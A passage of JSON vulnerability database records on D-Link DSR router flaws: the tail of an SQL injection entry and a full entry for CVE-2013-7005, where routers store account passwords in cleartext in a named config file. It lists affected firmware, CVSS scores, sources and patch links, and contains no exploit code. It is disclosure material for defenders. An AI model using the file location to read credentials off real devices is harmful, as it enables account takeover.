"trust": 0.1,
"url": "http://tsd.dlink.com.tw"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15014"
},
{
"db": "BID",
"id": "64172"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
},
{
"db": "PACKETSTORM",
"id": "124319"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
},
{
"db": "NVD",
"id": "CVE-2013-5945"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-15014",
"ident": null
},
{
"db": "BID",
"id": "64172",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007216",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "124319",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2013-5945",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2013-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15014",
"ident": null
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "64172",
"ident": null
},
{
"date": "2020-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007216",
"ident": null
},
{
"date": "2013-12-07T17:10:52",
"db": "PACKETSTORM",
"id": "124319",
"ident": null
},
{
"date": "2013-12-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-319",
"ident": null
},
{
"date": "2020-02-11T12:15:11.757000",
"db": "NVD",
"id": "CVE-2013-5945",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2013-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15014",
"ident": null
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "64172",
"ident": null
},
{
"date": "2020-02-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007216",
"ident": null
},
{
"date": "2021-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-319",
"ident": null
},
{
"date": "2024-11-21T01:58:28.210000",
"db": "NVD",
"id": "CVE-2013-5945",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "124319"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "plural D-Link In the product SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007216"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-319"
}
],
"trust": 0.6
}
}
var-201312-0290
Vulnerability from variot
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii. D-Link DSR is a wireless service router product. There are multiple information disclosure vulnerabilities in the D-Link DSR Router Series account credentials. Allows an attacker to access sensitive information. The information obtained may lead to further attacks. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0290",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b46"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b31"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-250n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b39"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-500n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b31"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b53"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b50"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b53"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-250",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b39"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b50"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b35"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-150",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b29"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b20"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b20"
},
{
"model": "dsr-1000n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-150n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b50"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b56"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b56"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-1000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-500",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b29"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b46"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-150n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b48"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b46"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-1000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-1000n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-150",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"model": "dsr-150n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.05b64"
},
{
"model": "dsr-250",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"model": "dsr-250n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"model": "dsr-500",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-500n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-150 v1.08b44",
"scope": "lt",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n v1.05b64",
"scope": "lt",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250 and dsr-250n v1.08b44",
"scope": "lt",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500 and dsr-500n v1.08b77",
"scope": "lt",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000 and dsr-1000n v1.08b77",
"scope": "lt",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.08b31"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b36"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.02b11"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b12"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.02b25"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b36"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b27"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.05b53"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b12"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b23"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-150n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-500n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250n 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n 1.05b64",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "BID",
"id": "64461"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:d-link:dsr-1000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-1000n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-150",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-150n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-250",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-250n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-500n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "64461"
}
],
"trust": 0.3
},
"cve": "CVE-2013-7005",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2013-7005",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2013-15507",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-67007",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7005",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-7005",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2013-15507",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-401",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-67007",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "VULHUB",
"id": "VHN-67007"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii. D-Link DSR is a wireless service router product. There are multiple information disclosure vulnerabilities in the D-Link DSR Router Series account credentials. Allows an attacker to access sensitive information. The information obtained may lead to further attacks. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7005"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "BID",
"id": "64461"
},
{
"db": "VULHUB",
"id": "VHN-67007"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7005",
"trust": 3.4
},
{
"db": "EXPLOIT-DB",
"id": "30061",
"trust": 1.7
},
{
"db": "BID",
"id": "64461",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-15507",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-67007",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "VULHUB",
"id": "VHN-67007"
},
{
"db": "BID",
"id": "64461"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
},
{
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"id": "VAR-201312-0290",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "VULHUB",
"id": "VHN-67007"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
}
]
},
"last_update_date": "2024-11-23T22:08:28.211000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Services Routers",
"trust": 0.8,
"url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
},
{
"title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
"trust": 0.8,
"url": "http://www.dlink-jp.com/router-firewall"
},
{
"title": "Downloads",
"trust": 0.8,
"url": "http://tsd.dlink.com.tw/"
},
{
"title": "D-Link DSR Router Series account credentials have multiple patches for information disclosure vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/41954"
},
{
"title": "DSR-250N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47082"
},
{
"title": "DSR-250_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47081"
},
{
"title": "DSR-150N_A2_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47080"
},
{
"title": "DSR-150_A2_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47079"
},
{
"title": "DSR-150_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47078"
},
{
"title": "DSR-1000_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47085"
},
{
"title": "DSR-500N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47084"
},
{
"title": "DSR-500_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47083"
},
{
"title": "DSR-1000N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47086"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15507"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-401"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67007"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005616"
},
{
"db": "NVD",
"id": "CVE-2013-7005"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
